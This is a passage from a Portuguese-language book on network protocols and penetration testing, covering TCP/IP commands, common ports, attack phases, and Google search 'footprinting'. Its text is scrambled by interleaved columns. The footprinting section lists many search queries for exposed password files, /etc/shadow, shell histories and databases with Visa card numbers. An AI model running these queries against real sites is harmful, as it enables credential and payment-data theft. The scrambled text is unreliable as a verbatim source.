traduzir um nome transmitidos durante a A maioria dos servidores FTP pode ser acessada por
de domnio, ele pergunta a outro que, se no souber, conexo SSL. Atualmente, quase todos os browsers usurios nocadastrados,
pergunta a um suportam esse utilizando o usurio Anonymous.
terceiro servidor e, assim, sucessivamente, at que o protocolo, e muitos sites Web o utilizam para obter Esse usurio no requer senha, mas muitos servidores
endereo IP seja informaes solicitam
obtido. Um domnio pode ser colocado em um subdomnio. confidencias de um cliente, como, por exemplo, nmeros como senha um endereo de e-mail.
Alguns exemplos de domnios comuns so: de carto de Vejamos detalhadamente:
COM: Organizaes Comerciais. crdito. As URLs que requerem uma conexo SSL 20
EDU: Organizaes Educacionais. comeam com HTTPS ao -v: Elimina as mensagens de resposta do servidor.
GOV: Organizaes Governamentais. invs de HTTP. -d: Ativa o modo de depurao, exibindo os comandos
MIL: Organizaes Militares. 19 FTP
ORG: Outras Organizaes. 2.2.1.9 SSh enviados e recebidos.
NET: Organizaes relacionadas com a Internet. Praticamente uma evoluo do Telnet, o SSh (Secure Shell) -i: Desativa a confirmao para a transferncia de
Identificador do Pas: So duas letras que representam foi cada
um pas em desenvolvido para permitir que voc se conecte a uma arquivo em operaes com mltiplos arquivos.
particular. Exemplo: br (Brasil). mquina remota, -n: Elimina o login automtico na conexo inicial.
2.2.1.7 Telnet execute comandos e mova arquivos entre uma mquina e -g: Desativa o globbing que permite o uso de caracteres
Um programa de emulao de terminal para redes outra. Ele possui de
TCP/IP, como a Internet. um excelente sistema de autenticao e criptografia em mscara (*, ?) em nomes de arquivos.
O programa Telnet roda no seu computador e se conecta meios inseguros -s: Especifica um arquivo de texto contendo os comandos
a um servidor na (Internet, por exemplo). O SSh o substituto de FTP
rede. Voc poder, ento, entrar com comandos programas como Rlogin, a serem executados automaticamente.
diretamente no programa Rsh, Rcp, Rdist e o prprio Telnet (que no utiliza -a: Utiliza qualquer placa de rede para estabelecer a
Telnet e eles sero executados como se voc estivesse criptografia). conexo
entrando com eles O SSh tambm protege uma rede de ataques, tais como com o servidor FTP.
diretamente no shell do sistema (prompt de comando). Isso o IP Spoofing e o -w: Define o tamanho do buffer de transferncia (o
possibilita a DNS Spoofing (vistos mais frente no livro). Se algum default
voc controlar o servidor e se comunicar com outros conseguir tomar o de 4 KBytes).
computadores na rede. controle da rede, s consegue forar o SSh a desconectar computador: Nome do servidor FTP ou endereo IP.
Para iniciar uma sesso de Telnet, voc precisa se logar e no consegue Deve ser
no servidor, obter nenhum dado importante. At na hora de se logar o ltimo parmetro da linha de comando.
entrando com nome de usurio e senha vlidos. s vezes, usando esse A seguir est a sintaxe dos comandos interativos do
voc no precisa protocolo a transmisso da senha criptografada, o que protocolo FTP.
nem se autenticar (exemplo: ao utilizar Telnet para se impede que Esses comandos so utilizados de acordo com cada
conectar porta do algum a capture. sistema e,
SMTP). 2.2.2 Comandos geralmente, j com a conexo on-line.
2.2.1.8 SSL 2.2.2.1 FTP Append: Acrescenta informaes a um arquivo.
O SSL (Secure Sockets Layer) foi desenvolvido pela Transfere arquivos de ou para um computador remoto. Ascii: Indica que a transferncia de arquivos ser feita
Netscape para ftp [-v] [-d] [-i] [-n] [-g] [-s:nomearq] [-a] [-w:tamanho] no modo de
texto (arquivos apenas de texto, como TXT ou HTML). 21 Sendo que host indica o nome de host ou endereo IP do
Bell: Emite aviso sonoro ao trmino do comando. Mput: Copia mltiplos arquivos do computador local endereo
binary: Indica que a transferncia de arquivos ser feita para o remoto e porta, o endereo da porta remota.
no modo computador remoto. Comandos Interativos do Telnet
binrio (utilizado para arquivos no-textos, como fotos, Open: Estabelece uma conexo com um servidor FTP. close: Fecha uma conexo.
programas prompt: Ativa/desativa a confirmao para a display: Exibe opes de conexo.
e vdeos). transferncia com environ: Define variveis de ambiente.
Bye: Fecha a sesso FTP e sai do programa FTP. muitos arquivos. logout: Encerra uma conexo.
cd: Seleciona um novo diretrio de trabalho no Put: Copia um arquivo do computador local para um mode: Alterna entre os modos de transferncia ASCII e
computador remoto. computador binrio.
Close: Fecha a sesso com um servidor FTP. remoto (upload). open: Efetua a conexo com um computador remoto.
Debug: Ativa/desativa o modo de depurao. Pwd: Exibe o diretrio corrente no computador remoto. quit: Sai do Telnet.
Delete: Elimina arquivos no computador remoto. Quit: Fecha a sesso FTP e sai do programa FTP. send: Envia seqncias de protocolo Telnet especiais
Dir: Lista o contedo de um diretrio remoto. Quote: Envia uma linha de comando diretamente ao para um
disconnect: Fecha a sesso com um servidor FTP. servidor FTP. computador remoto.
Get: Copia um arquivo de um computador remoto para Recv: Copia um arquivo de um computador remoto para set: Define opes de conexo.
o o unset: Desativa parmetros de conexo.
computador local. computador local. 2.3 Camada de Transporte
Glob: Ativa/desativa o uso de caracteres de mscara remotehelp: Exibe help on-line para comandos diretos Essa camada responsvel pelo controle do fluxo,
(*,?) em do servidor confiabilidade e possvel
nomes de arquivos. FTP. correo de erros na entrega dos dados. So esses
Hash: Ativa/desativa a impresso de # para cada Rename: Renomeia um arquivo. protocolos que fazem a
buffer Rmdir: Remove um diretrio no computador remoto. comunicao nas redes TCP/IP to estveis hoje. O
transferido. Send: Copia um arquivo do computador local para um prprio TCP no nome do
Help: Exibe help on-line de um comando FTP. Se o computador protocolo corresponde a um dos excelentes recursos dessa
comando no remoto (upload). camada.
for especificado, exibe a lista dos comandos disponveis. Status: Exibe informaes sobre a configurao do 2.3.1 Protocolos
Lcd: Seleciona um novo diretrio de trabalho no cliente FTP. 2.3.1.1 TCP
computador local. Trace: Ativa/desativa o modo trace (exibio de todas Transmission Control Protocol ou TCP um protocolo
Literal: Envia uma linha de comando diretamente ao as aes confivel para a
servidor FTP. executadas). transmisso de dados. Dizemos confivel porque ele se
Ls: Lista o contedo de um diretrio remoto. Type: Define ou exibe o tipo de transferncia de assegura de
Mdelete: Elimina mltiplos arquivos no computador arquivo (ASCII ou conseguir a conexo antes de enviar as informaes; caso
remoto. binary). no consiga,
Mdir: Lista o contedo de mltiplos diretrios no servidor User: Especifica um novo usurio para o computador retorna um erro. O TCP tambm garante que todos os
remoto. remoto. pacotes sejam
Mget: Copia mltiplos arquivos do computador remoto 2.2.2.2 Telnet entregues e na exata ordem em que eles foram enviados.
para o Conecta-se a uma mquina remota, utilizando seus fcil perceber a
computador local. recursos disponveis. ao desse protocolo. Quando nos conectamos a um
Mkdir: Cria um diretrio no computador remoto. telnet [host [porta]] Messenger
Mls: Lista o contedo de mltiplos diretrios no servidor 22 instantneo, um servidor de FTP, uma pgina Web ou
remoto. mesmo enviamos um
e-mail, estamos usando o TCP. 19 TCP Chargen 1024 TCP Motorola_Cable_Modem_Telnet
2.3.1.2 UDP 20 TCP FTP Data 1433 TCP MS_SQL
23 21 TCP FTP 1498 TCP Sybase-Sql-Anywhere
UDP ou User Datagram Protocol um protocolo de 22 TCP SSH 1525 TCP Oracle-Srv
transporte de dados 23 TCP Telnet 1527 TCP Oracle-Tli
que, ao contrrio do TCP, no faz nenhum tipo de 25 TCP SMTP 1723 TCP PPTP
conexo. Ele tambm 42 TCP Name server 1745 TCP Winsock_Proxy
possui poucos servios de recuperao de erros, 43 TCP Whois 2000 TCP Remotely_Anywhere
oferecendo, ao invs disso, 49 UDP Tacacs 2001 TCP Cisco-mgmt
uma maneira direta de enviar e receber dados em uma 53 TCP DNS-zone 2049 TCP NFS
rede. usado 53 UDP DNS-lookup Essas so s algumas das muitas portas existentes. Para
principalmente para o broadcast de mensagens em uma 66 TCP Oracle Sqlnet uma lista
rede. Uma das 69 UDP TFTP gigantesca de descrio de portas, visite o link a seguir:
utilizaes em que voc pode notar isso no streaming de 70 TCP Gopher <http://www.abusar.org/manuais/relacao_portas.html>
vdeo pela 79 TCP Finger 2.3.2 Comandos
Internet. Neste voc pode perceber que h pequenas 24 2.3.2.1 Netstat
falhas, alguns cortes 80 TCP HTTP 25
etc. Isso UDP, utilizado, nesse caso, porque a velocidade 81 TCP HTTP1 Lista as conexes ativas no momento, entre outras opes.
de transmisso 88 TCP Kerberos netstat [-a] [-e] [-n] [-o] [-p Protocolo] [-r] [-s] [Intervalo]
maior que a do TCP. 109 TCP Pop2 Sendo que:
2.3.1.3 Portas 110 TCP Pop3 -a: Mostra todas as conexes TCP ativas e as portas
Para conseguir manipular mltiplas conexes ao mesmo 111 TCP SunRPC TCP e UDP que
tempo, tanto o TCP 119 TCP NNTP esto abertas.
quanto o UDP utilizam nmeros de portas. O intervalo 135 TCP NT_RPC -e: Mostra estatsticas Ethernet, como o nmero de bytes
numrico utilizado 139 TCP Netbios e pacotes
vai de 0 a 65.535. Muitos tipos de conversaes usam 143 TCP IMAP enviados e recebidos. Esse parmetro pode ser
portas especficas, 161 UDP SNMP combinado com -s.
como o SMTP, que utiliza a porta 25. Mas muitas dessas 162 UDP SNMP-TRAP -n: Mostra conexes TCP ativas, fornecendo apenas
portas no tm 179 TCP Bgp endereos
uma descrio e podem ser aleatoriamente utilizadas. 256 TCP SNMP-Checkpoint numricos, sem os nomes de domnios.
Os nmeros anteriores a 255 so para aplicativos 389 TCP LDAP -o: Mostra conexes TCP ativas e inclui o nmero do
pblicos. 396 TCP Netware-IP processo para
Os nmeros de 255 a 1.023 so usados por aplicativos 443 TCP HTTPS cada conexo. Esse parmetro pode ser combinado com -
comerciais. 513 TCP Rlogin a, -n e -p.
Os nmeros acima de 1.023 no so regulamentados. 513 UDP Rwho -p Protocolo: Mostra conexes especficas por protocolo.
A seguir, voc ver algumas portas e alguns servios 514 TCP Rshell Eles podem
comumente 515 TCP Printer ser: tcp, udp, tcpv6 ou udpv6. Se esse parmetro for
utilizados nelas: 515 UDP Printer usado com -s,
PORTA PROTOCOLO SERVIO 520 UDP Router podem ser usados tcp, udp, icmp, ip, tcpv6, udpv6,
7 TCP Echo 524 TCP Netware-Ncp icmpv6 ou ipv6.
11 TCP Systat 799 TCP Remotely_Possible -s: Mostra estatsticas de cada protocolo pedido. O
13 TCP Daytime 1080 TCP Socks/Wingate parmetro -p pode
ser usado para especificar um conjunto de protocolos. contnuas de endereos IP. Todos os endereos da rede Poro da Rede 192.168.0.X
-r: Mostra o contedo da tabela de roteamento IP. Isso tm um nmero de Endereo da Rede 192.168.0.0
equivalente dgitos dentro dos endereos em comum. A poro dos Endereo Broadcast 192.168.0.255
ao comando route print. endereos que so 27
Intervalo: Repete as informaes pedidas a cada n comuns entre todos os endereos de uma rede chamada Algumas outras pessoas adotam o endereo de rede
segundos. de poro da como o endereo
Pressione Ctrl+C para parar. Se esse parmetro for rede. Os dgitos restantes so chamados de poro dos broadcast.
omitido, o Netstat hosts. O nmero Para facilitar o endereamento, alguns grupos de
mostrar a informao somente uma vez. de bits que so compartilhados por todos os endereos endereos foram
/?: Mostra a ajuda. dentro da rede formados nas redes e agrupados em classes, que
2.4 Camada de Internet chamado de mscara de rede (netmask) e o papel dela guardam um tamanho
O objetivo dessa camada assegurar que os dados determinar padro das redes que podem ser usadas. As faixas
cheguem ao seu quais endereos pertencem ou no rede. Por exemplo: dessas classes so as
destino, independente do caminho e das redes que Qualquer endereo que termine em zero na sua mscara seguintes:
utilizem para isso. O de rede Classe Mscara de rede Endereo de Rede
protocolo especfico que governa essa camada revelar o endereo da rede a que pertence. O A 255.0.0.0 0.0.0.0 a
chamado Protocolo de endereo de rede sempre 127.255.255.255
26 o menor endereo numrico dentro da escala de B 255.255.0.0 128.0.0.0 a
Internet (IP). A determinao do melhor caminho e a endereos da rede e 127.255.255.255
comutao de pacotes sempre possui a poro host dos endereos codificada C 255.255.255.0 192.0.0.0 a
acontecem nessa camada. Pense nisso em termos do como zeros. 223.255.255.255
sistema postal. O endereo de broadcast um endereo especial que Multicast 240.0.0.0 224.0.0.0 a
Quando envia uma carta, voc no sabe como ela vai cada 239.255.255.255
chegar ao seu destino computador em uma rede "escuta" em adio a seu 2.4.1.2 ICMP
(existem vrias rotas possveis), mas o que realmente prprio endereo. Esse Abreviatura de Internet Control Message Protocol. A
importa que ela um endereo onde os datagramas enviados so funo do ICMP
chegue. Vejamos alguns protocolos dessa camada a recebidos por todos os enviar pacotes avisando possveis erros ou informaes.
seguir. computadores da rede. Certos tipos de dados, como muito utilizado
2.4.1 Protocolos informaes de pelo comando Ping, que pode ser usado para testar se
2.4.1.1 IP roteamento e mensagens de alerta, so transmitidos para um computador est
O endereo IP um conjunto de nmeros que identificam o endereo on-line ou no.
seu broadcast e, assim, todo computador na rede pode 2.4.1.3 ARP
computador em uma rede. Inicialmente, voc pode receb-los Abreviatura de Address Resolution Protocol, protocolo
imaginar o IP como um simultaneamente. usado para converter
nmero de telefone. Por padro, cada computador ou Existem dois padres normalmente usados para um endereo IP em endereo fsico, como um endereo
equipamento ligado especificar o Ethernet (MAC).
Internet possui um endereo desse tipo. Tambm endereo de broadcast. O mais aceito usar o endereo Um computador, querendo saber o endereo fsico de
permitido que o mesmo mais alto da rede outro, faz um
endereo IP seja usado em mais de uma interface (placa como endereo broadcast. No exemplo anterior, este broadcast na rede e o sistema procurado responde com a
de rede) de um seria 192.168. 0.255. informao
mesmo computador. As Redes do Protocolo Internet so Endereo do Host 192.168.0.125 requisitada. Tambm existe o Reverse ARP (RARP), que
seqncias Mscara da Rede 255.255.255.0 pode ser usado por
um host para descobrir seu endereo IP. Dessa maneira, o de rede indicada por IPInterface. Utilizado para testar a conexo com outro host. O Ping
computador faz -N: Especifica o endereo IP da placa de rede qual o envia uma
um broadcast do seu endereo fsico e um servidor RARP comando mensagem ao host remoto e aguarda uma resposta
responde com o se aplica. contendo a mesma
endereo IP do computador procurado. 2.4.2.2 Ipconfig mensagem (echo). Se essa resposta chegar, presume-se
2.4.2 Comandos 29 que o host
2.4.2.1 ARP Exibe a configurao do protocolo TCP/IP. Sem nenhum esteja ativo.
28 parmetro, ping endereoIP | hostname [chaves]
Permite manipular o protocolo ARP, colocando, exibe os valores de endereo IP, mscara de sub-rede e Observe as descries a seguir:
consultando ou default gateway endereoIP: Endereo IP (ou hostname) do host com o
removendo entradas na tabela. para cada placa de rede instalada. qual se
arp -a [endereoIP] [-N IPInterface] ipconfig [/? | /all | /release [adaptador] | /renew est testando a conexo.
arp -s endereoIP endereoMAC [IPInterface] [adaptador]] -a: Realiza a resoluo DNS reversa, informando o
arp -d endereoIP [IPInterface] O /all Exibe informaes detalhadas de IP para as hostname do
Observe, a seguir, os parmetros e suas respectivas placas de rede host.
descries: instaladas. Alm do endereo IP da mscara de sub-rede -n nmero: Define o nmero de comandos Ping que
endereoIP: Especifica o endereo IP a resolver ou e do default sero
alterar. gateway, so exibidos tambm os endereos dos executados.
EndereoMAC: Especifica o endereo MAC a servidores DHCP, WINS -l tamanho: Define o tamanho da mensagem utilizada no
acrescentar ao e DNS para cada placa de rede instalada. Enquanto o comando
cache do ARP. O endereo MAC composto por 6 bytes /release libera o Ping (default=32 bytes).
(expressos em notao hexadecimal) separados por hfen. endereo IP obtido para uma placa de rede atravs de -f: Define a flag. Do Not Fragment envia a
IPInterface: Especifica o endereo IP da placa de rede um servidor mensagem sem
cuja DHCP. Se a placa de rede no for especificada, libera os fragment-la.
tabela ARP dever ser alterada. Por default, a primeira endereos IP -i ttl: Time To Live: Define o nmero mximo de hops
interface obtidos para todas as placas de rede do computador. J pelos quais
disponvel ser utilizada. o /renew renova os pacotes podem passar (1-255).
-a: Exibe as entradas de cache do ARP. Se o endereoIP um endereo IP obtido para uma placa de rede atravs -j hosts: Rota de origem livre usando as entradas em
tiver de um servidor hosts.
sido especificado, mostra somente a entrada referente a DHCP. Se a placa de rede no for especificada, renova -k hosts: Rota de origem restrita usando as entradas em
esse os endereos IP hosts.
endereo. obtidos para todas as placas de rede instaladas no -r nmero: Registra a rota dos pacotes. Define quantos
-g: O mesmo que a. computador. Por fim, o hops sero
-d: Exclui do cache do ARP o host especificado por adaptador Especifica uma placa de rede na renovao armazenados (mximo=9).
endereoIP. ou liberao de um -s nmero: Timestamp do nmero de hops especificado.
Se IPInterface for especificado, exclui o host do cache da endereo IP obtido atravs de um servidor DHCP. Para -v TOS: Especifica o tipo de servio a ser utilizado.
placa de saber os nomes -t: Emite comandos Ping continuamente at ser
rede indicada por IPInterface. associados s placas de rede, utilize o comando Ipconfig interrompido.
-s: Acrescenta ao cache do ARP uma associao entre sem parmetros. Normalmente Ctrl+C utilizado para interromper.
endereoMAC e endereoIP. Se IPInterface tiver sido 2.4.2.3 Ping -w: Define o tempo mximo que o comando aguardar
especificado, acrescenta a associao no cache do ARP 30 por uma
da placa resposta (timeout).
Alguns roteadores, por questes de segurana, no 32 3.1 Partindo do Zero
encaminham 2.5.1 Unicast Antes de iniciar o ataque propriamente dito, um
pacotes enviados atravs do protocolo ICMP (utilizado Em uma transmisso unicast, uma cpia separada dos candidato a invasor
pelo Ping). O dados tem que passar por algumas etapas nas quais ir
comando Ping pode no obter sucesso devido a essa enviada de sua origem para cada computador cliente conhecer mais sobre o
filtragem. que os requisite. alvo, descobrir computadores ativos, enumerar possveis
31 Nenhum outro computador na rede recebe o trfego. No usurios e falhas
2.4.2.4 Tracert entanto, em ou mesmo rotas de acesso quele sistema. Essas etapas
O Tracert (traar rota) serve para verificarmos por uma rede com muitos computadores, o unicast no anteriores ao
quantos e quais sempre eficiente, ataque so determinantes do sucesso ou fracasso da
pontos de roteamento os nossos dados passam at chegar pois muitas vezes o computador de origem ter que tentativa. Muitas
a um destino transmitir mltiplas vezes, ao usar receitas de bolo, invasores menos
especificado. No exemplo anterior, levou apenas um cpias dos dados. experientes acabam
ponto de roteamento 2.5.2 Broadcast alertando o IDS e os administradores do sistema alvo,
para alcanar o destino pedido. Nesse tipo de transmisso, os dados so enviados apenas fazendo com que
tracert [-d] [h- hopsmx] [-j listahops] [-w timeout] destino uma vez, detectem rapidamente a tentativa de intruso. Esse
Sendo que: mas para toda a rede. Esse processo no muito problema quase no
-d: No converte os endereos em nomes de host. eficiente, pois faz a existe para algum com mais experincia, pois a pessoa
-h: Nmero mximo de hops (TTL) para encontrar o velocidade cair bastante, j que todos os computadores ir averiguar
destino. iro receber os todos os sistemas de segurana antes de tentar realizar
-j: Rota de origem livre com a listahops. dados. Mesmo os hosts que no fizeram o pedido alguma coisa.
-w: Timeout, ou tempo mximo para resposta (em recebero os dados. Para realizarmos de modo eficiente o nosso Teste de
milissegundos). Somente no iro processar esses pedidos e envi-los ao Penetrao
destino: Nome do host de destino (ou endereo IP). sistema (Penetration Test), que extremamente necessrio para
2.4.3 Camada de Rede operacional. O protocolo ARP um dos que utiliza se manter uma
O significado do nome dessa camada muito amplo e um bastante o modo de boa segurana em um sistema, como mencionei
pouco confuso. broadcast. anteriormente, temos
tambm chamada de camada host-rede. a camada que 2.5.3 Multicast ento que seguir todas as etapas que um invasor seguiria,
se relaciona a uma mistura dos dois. enviada apenas uma cpia dos para
tudo aquilo que um pacote IP necessita para realmente dados e conseguirmos o mximo possvel de eficincia. O
estabelecer um link somente os computadores que fizeram o pedido os organograma a seguir
fsico e depois estabelecer outro link fsico. Isso inclui recebem, evitando, mostra de forma resumida essas etapas:
detalhes de assim, um trfego muito intenso e, conseqentemente, um 34
tecnologia de LAN e WAN e todos os detalhes nas congestionamento na rede. Muitos servios de Internet Footprinting
camadas fsicas e de usam multicast Varredura
enlace do OSI. para se comunicar com clientes. Inclusive, nesse tipo de Enumerao
2.5 Tipos de Transmisso de Dados comunicao Procura por
Protocolos roteveis permitem a transmisso de dados que se baseia o protocolo IGMP (Internet Group Message Falhas e
entre diversos Protocol, uma Problemas
segmentos de uma rede. A quantidade de trfego espcie de ICMP baseado em multicast). Mtodos para
gerada em uma rede 33 Burlar a Proteo
pode ser de trs tipos: unicast, broadcast e multicast. 3 Organizando o Penetration Test Enganar usurio Explorar falha Explorar M
Configurao Aqui entra a pesquisa para se identificar falhas nos suficiente para o funcionrio lhe dizer o que voc precisa
Recusa de servios, o que fica saber.
Servio mais fcil aps a enumerao, onde descobrimos quais os 3.8 Explorando Falhas
Engenharia servios que Seja um simples injection, uma race condition, um buffer
Social estavam rodando. Tambm utilizamos scanners de overflow ou
Malware vulnerabilidade para outro tipo de falha, nessa etapa j sabemos tudo sobre a
Injection adiantar a pesquisa. falha da qual
CSS 3.6 Mtodos de Burlar a Proteo queremos nos aproveitar para ganhar acesso ao sistema.
Exploits Aps identificarmos possveis falhas no sistema, temos que Precisamos agora
Senhas Fracas saber se de um meio para obter o acesso total do sistema, o que
(Bruteforce) teremos condies de explor-la ou podemos ser pode ser conseguido,
Sniffing barrados por alguma na maioria dos casos, atravs do shellcode no exploit.
NetBios ferramenta de proteo. Aqui pensamos em mtodos 3.9 Explorando M Configurao
DDoS para se burlar firewalls, No descobrimos nenhuma falha, nem conseguimos utilizar
Acesso no IDSs e antivrus, inclusive pensando em outros mtodos que a
autorizado no sejam Engenharia Social para obter acesso ao sistema. Podemos
Segurana explorao de falhas. ento nos
35 Depois desse ponto, o ataque pode tomar direes muito aproveitar da m configurao do sistema. Por exemplo,
Vamos falar um pouco sobre cada uma dessas etapas. diferentes. se eu tentar me
3.2 FootPrinting Podemos explorar uma falha encontrada; caso nenhuma logar como um usurio e, aps algumas tentativas de
Primeiro passo do invasor. Tcnica utilizada para falha seja senha, o sistema no
pesquisar e descobrir encontrada, podemos utilizar a Engenharia Social para a me desconectar, significa que ele tem uma configurao
informaes sobre o alvo. Inclumos recursos de instalao de de segurana fraca.
mapeamento de redes e backdoors (cavalos de tria), explorar uma m- Podemos utilizar a fora bruta para tentar descobrir
consultas a bancos de dados Whois, alm de sites como o configurao (senhas fceis, senhas fceis nos
Google. por exemplo) ou simplesmente esquecer de tentar a servios do sistema. Se estivermos em uma rede local e o
3.3 Varredura invaso e pensar em trfego no for
Descoberta de computadores ativos na rede atravs de derrubar o sistema com um Denial of Service (recusa de cuidado, sendo criptografado e segmentado, podemos
ICMP (Ping) e servio). tambm sniffar
de portas de servios abertas nesses sistemas. um passo 3.7 Engenharia Social informaes importantes ou pesquisar se a mquina possui
importante, pois a Se for necessrio, precisamos apelar para a Engenharia recursos de
partir desse ponto a tentativa de invaso vai tomar um Social. Atravs compartilhamento (Netbios) no-protegidos.
rumo distinto. dessas tcnicas, podemos fazer com que algum execute 3.10 Recusa de Servio
3.4 Enumerao algum software Nesse caso, no queremos acesso no-autorizado ao
Identificao dos servios que esto rodando nas portas malicioso (malware), como keyloggers ou trojans, que nos sistema e, sim,
dos sistemas fornea as derrub-lo da Internet utilizando diversas tcnicas
descobertos, alm da descoberta do sistema operacional informaes que precisamos, ou mesmo atravs de um diferentes; o que pode ser
utilizado. fake mail podemos conseguido principalmente atravs de softwares zumbis e
Compilao de dados sobre recursos disponveis, tais 36 vrus.
como conseguir dados importantes. s vezes, apenas uma 3.11 Segurana
compartilhamentos e usurios existentes no sistema. simples conversa Aps abordarmos todas as etapas do Penetration Test,
3.5 Procura por Falhas e Problemas vamos discutir
sobre a segurana em si. Dicas simples de como obt-la e realizar operaes como: filtrar pesquisas nos websites, resultados como: universidade estadual de minas,
apagar rastros, descobrir universidade
alm da anlise de ferramentas necessrias para essa endereos de e-mails, arquivos da instalao de algum federal de minas, universidade especial de minas etc.
tarefa, tais como IDS, software A ordem das palavras faz diferena. Pesquisar futebol
Firewalls, Honeypots, Monitoradores do Registro e de esquecidos, traar rotas at o alvo, consultar o seu pel e pel
arquivos. Voc domnio e diversas futebol gera diferentes resultados.
aprender como deixar o seu sistema mais protegido. outras tarefas que tenham o intuito de lhe ensinar mais O sinal de mais (+) funciona como operador AND e o
37 sobre o seu alvo. sinal de
4 Footprinting Sam Spade em funcionamento. menos (-) como operador NOT. Exemplo: quero procurar
Essa tcnica o primeiro passo para uma intruso bem- 4.3 Google por:
sucedida. O terceiro mtodo de se fazer footprinting de um modo hackers brasileiros. Se eu colocar desse jeito no Google,
Utilizando mtodos mais leves, o footprinting consegue eficiente ele
descobrir utilizar pginas de busca na Internet, em especial o procura por pginas que contenham cada uma das
informaes teis, como e-mails dos usurios, informaes Google. Ele possui um palavras. Se
de rede, links recurso poderoso de obteno e procura de informaes, eu colocar +hackers +brasileiros, ele ir procurar por
importantes e at alguns documentos desprotegidos. Voc baseado no sites que
pode fazer isso PageRank. Atravs do GoogleBot, um script tenham as duas palavras. Por fim se colocarmos hackers
manualmente, utilizando alguns bons programas ou mesmo automatizado, ele varre toda brasileiros, ele ir procurar por todos os sites que
alguns sites a rede, atravessando todos os possveis links e contenham a
teis na Internet. Vamos dividir essas etapas em trs: catalogando as pginas palavra hackers, exceto os que contm a palavra
4.1 Pesquisa Manual que descobriu, alm de remover de seu cadastro alguma brasileiros.
A pesquisa manual o mais simples dos processos de que possa ter 4.3.2 Alguns Comandos do Google
footprinting. 39 Intext: Procura informao no texto das pginas.
Consiste simplesmente em visitar o site-alvo em busca de deixado de existir. Enfim, o Google uma ferramenta de Inurl: Procura informao em links. Ex:
informaes busca que no www.invasao.com.br.
valiosas e consultar informaes sobre o domnio da requer interao humana (como cadastro manual de sites). Inanchor: Procura informao no texto de um link. Ex:
empresa (sites como Com um download
<www.registro.br> e <www.internic.net> podem fornecer sistema to potente, no fica difcil imaginar porque hoje (palavra muito comum em textos de links).
informaes ele a melhor Intitle: Procura informao no ttulo das pginas.
valiosas). Pode-se fazer, tambm, pesquisas em jornais ferramenta de footprinting existente e, claro, a mais Cache: Mostra o cache do google de determinada
on-line sobre notcias utilizada com essa pgina.
passadas daquela determinada empresa e at mesmo finalidade. Site: Especifica em quais sites a busca ser feita.
pesquisas jurdicas 4.3.1 Consideraes Importantes Exemplo: com.br
(saber com quem o nosso alvo andou tendo certos O Google no diferencia letras maisculas de (procurar s em sites comerciais no Brasil), gov.br
atritos ajuda bastante). minsculas. (procurar s em
38 O mximo de palavras-chave para a pesquisa so 10. sites do governo do Brasil), uol.com.br (procurar apenas
4.2 Pesquisa Automatizada permitida a pesquisa com wildcards (asteriscos). Assim, no site
Nesse tipo de pesquisa, utilizamos ferramentas voc UOL).
automticas que possam especifica s uma parte do que quer encontrar e v Filetype: Especificar o tipo de arquivo que quer
descobrir informaes teis sobre qualquer alvo. Esses diversas encontrar. Voc
programas podem opes. Ex: universidade * de minas. Essa pesquisa vai precisa colocar apenas a extenso. Ex: pdf, doc, swf, xls,
gerar ini, pwd,
mdb. A seguir, voc v algumas outras dicas de procura. O que inurl:orders.txt
Voc pode combinar esses comandos. Exemplo: quero vale a inurl:"wwwroot/*."
pesquisar por imaginao, j que a ferramenta que utilizamos tem um inurl:adpassword.txt
sites que contenham a palavra segurana no ttulo da poder quase inurl:webeditor.php
pgina e que ilimitado. inurl:file_upload.php
sejam somente do Brasil. Index of /admin inurl:gov filetype:xls "restricted"
+intitle:segurana +site:br Index of /passwd index of ftp +.mdb allinurl:/cgi-bin/ +mailto
40 Index of /password intitle:"Index of" .sh_history
Vamos pesquisar agora por sites no indexados. So Index of /mail intitle:"Index of" .bash_history
locais nos quais "Index of /" +passwd intitle:"index of" passwd
no se colocou um index.htm ou uma pgina principal. "Index of /" +password.txt intitle:"index of" people.lst
Quando voc os "Index of /" +.htaccess intitle:"index of" pwd.db
acessa, esses sites simplesmente lhe mostram uma lista dos "Index of /secret" intitle:"index of" etc/shadow
arquivos que "Index of /confidential" intitle:"index of" spwd
esto ali. Alm disso, vamos tentar conseguir uma pgina "Index of /root" intitle:"index of" master.passwd
de site no "Index of /cgi-bin" intitle:"index of" htpasswd
indexado que esteja no diretrio admin. "Index of /credit-card" intitle:"index of" members OR accounts
+inurl:admin +Index of /admin "Index of /logs" intitle:"index of" user_carts OR user_cart
41 "Index of /config" allintitle: sensitive filetype:doc
Outra pesquisa muito utilizada pelos famosos Script "VNC Desktop" inurl:5800 allintitle: restricted filetype :mail
Kiddies para se "# -FrontPage-" inurl:service.pwd allintitle: restricted filetype:doc site:gov
obter e descobrir senhas. A imaginao ajuda muito nesse "Novell, Inc" WEBACCESS Username Password "Version allinurl:/scripts/cart32.exe
ponto. Um *.*" allinurl:/CuteNews/show_archives.php
exemplo interessante a descoberta de arquivos INI de Copyright -inurl:help -guides|guide allinurl:/phpinfo.php
configurao, no "ASP.NET_SessionId" "data source=" allinurl:/privmsg.php
qual alguns deles contm at senhas com um fraco sistema ASP.login_aspx "ASP.NET_SessionId" 4.4 Softwares
de criptografia. filetype:cgi inurl:"Web_Store.cgi" 4.4.1 Windows
o caso do WS_FTP. Na pesquisa a seguir, especificamos inurl:profiles filetype:mdb Sam Spade (http://www.samspade.org/ssw/)
o tipo de arquivo intext:(password | passcode) intext:(username | userid | 4.4.2 Linux
(filetype) para INI e mandamos bala. user) HPing (www.hping.org)
E, por ltimo, quero demonstrar o quanto pode ser 43 44
perigoso o Google filetype:csv 4.5 Soluo
quando utilizado por mos erradas (mais ainda do que intitle:"Index Of" cookies.txt size O problema do footprinting no fcil de ser resolvido,
mostramos at inurl:forum filetype:mdb mas pode-se tomar
agora). Vamos tentar procurar por bancos de dados do inurl:backup filetype:mdb alguns cuidados que minimizaro esse problema.
Microsoft Access que inurl:admin filetype:txt Evitar que informaes importantes sejam colocadas
possuam nmeros do carto de crdito Visa, inurl:admin filetype:db desnecessariamente em seu site Web, como e-mails e
especificando novamente o inurl:admin filetype:cfg configuraes
filetype: inurl:mysql filetype:cfg de rede.
+filetype:MDB +visa inurl:passwd filetype:txt Procure sempre remover os scripts de instalao de uma
42 inurl:iisadmin ferramenta
inurl:auth_user_file.txt
Web, pois eles podem servir para o invasor tentar dvidas sobre ICMP, consultar novamente o captulo sobre que faa isso por voc. Coloque o endereo IP do
identificar o seu TCP/IP. computador que voc
sistema. Como j foi mostrado antes, utilizar esse comando bem descobriu atravs do Ping e pronto! Na maioria dos
Esteja sempre pesquisando no Google as informaes simples. s casos, os programas
